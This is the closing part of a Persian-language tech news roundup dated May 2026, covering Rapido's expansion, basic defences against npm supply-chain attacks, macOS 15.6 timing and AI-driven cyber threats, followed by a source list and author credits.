فعلاً خیر، Rapido فقط در ۱۲۰ شهر هند فعال است. اما شرکت اعلام کرده که قصد دارد در سال ۲۰۲۶ به بنگلادش و اندونزی گسترش یابد. دلیل انتخاب این کشورها؟ آنها هم مانند هند، ترافیک سنگین، جمعیت زیاد، و فرهنگ استفاده از موتورسیکلت دارند. اگر در این کشورها زندگی می‌کنید، احتمالاً تا پایان ۲۰۲۶ Rapido را خواهید دید. برای کشورهای دیگر، هنوز برنامه مشخصی اعلام نشده است.

❓ چگونه از حملات زنجیره تأمین محافظت کنیم؟

چند اقدام مهم:

۱. استفاده از Lock Files: همیشه package-lock.json یا yarn.lock را commit کنید تا نسخه دقیق بسته‌ها ثابت بماند.
۲. پین کردن نسخه‌ها: به جای "^5.0.0" از "5.0.0" استفاده کنید.
۳. بررسی منظم: هر هفته npm audit یا yarn audit اجرا کنید.
۴. استفاده از ابزارهای امنیتی: Snyk، Socket Security، یا Dependabot را فعال کنید.
۵. Private Registry: اگر شرکت بزرگی هستید، از یک npm registry خصوصی استفاده کنید.
۶. Code Review: حتی برای بسته‌های شخص ثالث، کد را بررسی کنید (حداقل برای بسته‌های مهم).
۷. محدود کردن دسترسی: از environment variables برای secrets استفاده نکنید، از vault استفاده کنید.

❓ چه زمانی macOS 15.6 منتشر می‌شود؟

طبق اعلام اپل، macOS 15.6 که شامل رفع ۱۷ باگ کشف شده توسط Mythos است، در اوایل ژوئن ۲۰۲۶ منتشر خواهد شد. معمولاً اپل آپدیت‌های امنیتی را در سه‌شنبه‌های اول یا دوم ماه منتشر می‌کند، بنابراین انتظار دارید حدود ۳ یا ۱۰ ژوئن باشد. تا آن زمان، مطمئن شوید که macOS خود را به آخرین نسخه موجود (15.5.2) آپدیت کرده‌اید. همچنین توصیه می‌شود از نصب برنامه‌های ناشناس و باز کردن فایل‌های مشکوک خودداری کنید.

❓ آیا باید نگران حملات AI باشیم؟

بله، اما نه به شکلی که فیلم‌ها نشان می‌دهند. خطر واقعی این نیست که AI‌ها شورش کنند و انسان‌ها را نابود کنند. خطر واقعی این است که هکرها از AI استفاده کنند تا حملات پیچیده‌تر و سریع‌تر انجام دهند. مثلاً:

• AI می‌تواند باگ‌ها را سریع‌تر از محققان انسانی پیدا کند
• AI می‌تواند ایمیل‌های فیشینگ بسیار قانع‌کننده بنویسد
• AI می‌تواند کدهای بدافزار را به گونه‌ای بنویسد که آنتی‌ویروس‌ها نتوانند تشخیص دهند

خبر خوب؟ شرکت‌های امنیتی هم از AI استفاده می‌کنند تا از ما محافظت کنند. این یک مسابقه است، و هر کس AI بهتری داشته باشد، برنده می‌شود.

💭 نظر نهایی: شبی پر از هشدارها و فرصت‌ها

امشب یکی از مهم‌ترین شب‌های سال ۲۰۲۶ از نظر امنیت سایبری بود. سه آسیب‌پذیری/حمله بزرگ — Exchange، TanStack و macOS — همه در یک روز. این تصادف نیست. این نشان می‌دهد که حملات سایبری در حال افزایش هستند و هکرها هوشمندتر می‌شوند.

اما خبر خوب این است که ما هم هوشمندتر می‌شویم. ابزارهایی مانند Mythos نشان می‌دهند که AI می‌تواند به ما کمک کند امن‌تر باشیم. رویکردهایی مانند Thinking Machines نشان می‌دهند که می‌توانیم AI قدرتمند و در عین حال امن بسازیم. و تنظیم‌گری‌هایی مانند CFTC نشان می‌دهند که دولت‌ها در حال یادگیری نظارت بهتر بر فناوری‌های جدید هستند.

پیام امشب ساده است: امنیت مسئولیت همه ماست. چه توسعه‌دهنده باشید، چه مدیر IT، چه کاربر عادی — همه باید آگاه باشیم، محتاط باشیم و به‌روز باشیم. فردا صبح در تکین مورنینگ با اخبار جدید برمی‌گردیم. تا آن زمان، سیستم‌هایتان را آپدیت کنید و امن بمانید! 🔒

📚 منابع و مراجع

  • BleepingComputer — "Microsoft Exchange CVE-2026-42897 actively exploited in the wild"
  • SecurityWeek — "CISA adds Exchange vulnerability to Known Exploited list"
  • The Verge — "OpenAI confirms two employee devices compromised in TanStack attack"
  • TechCrunch — "Supply chain attack hits OpenAI through npm package"
  • Ars Technica — "Anthropic's Mythos AI discovers 17 macOS bugs"
  • The Register — "AI finds security flaws faster than human researchers"
  • Bloomberg — "Mira Murati launches Thinking Machines with $85M funding"
  • Reuters — "CFTC using AI to detect insider trading on Polymarket"
  • CoinDesk — "Prediction markets face increased regulatory scrutiny"
  • TechCrunch — "Rapido raises $240M at $3B valuation"
  • Economic Times — "Indian ride-hailing startup Rapido becomes profitable"
  • تیم تحریریه تکین — تحقیق و تحلیل

🌐 در تماس باشید

برای دریافت آخرین اخبار تکنولوژی، امنیت سایبری و گیمینگ، ما را در شبکه‌های اجتماعی دنبال کنید:

گالری تصاویر تکمیلی: 🌙 تکین نایت ۱۶ می ۲۰۲۶: هک شدن OpenAI، فاجعه مایکروسافت Exchange و بازگشت میرا موراتی

نویسنده مقاله

مجید قربانی‌نژاد

مجید قربانی‌نژاد، طراح و تحلیل‌گر دنیای تکنولوژی و گیمینگ در TekinGame. عاشق ترکیب خلاقیت با تکنولوژی و ساده‌سازی تجربه‌های پیچیده برای کاربران. تمرکز اصلی او روی بررسی سخت‌افزار، آموزش‌های کاربردی و ساخت تجربه‌های کاربری متمایز است.

جامعه تکین‌گیم

نظرات شما مستقیماً روی نقشه راه ما تاثیر دارد.

+500 مشارکت فعال
دنبال کردن نویسنده

اشتراک‌گذاری مقاله

Join the Debate

فهرست مطالب

🌙 تکین نایت ۱۶ می ۲۰۲۶: هک شدن OpenAI، فاجعه مایکروسافت Exchange و بازگشت میرا موراتی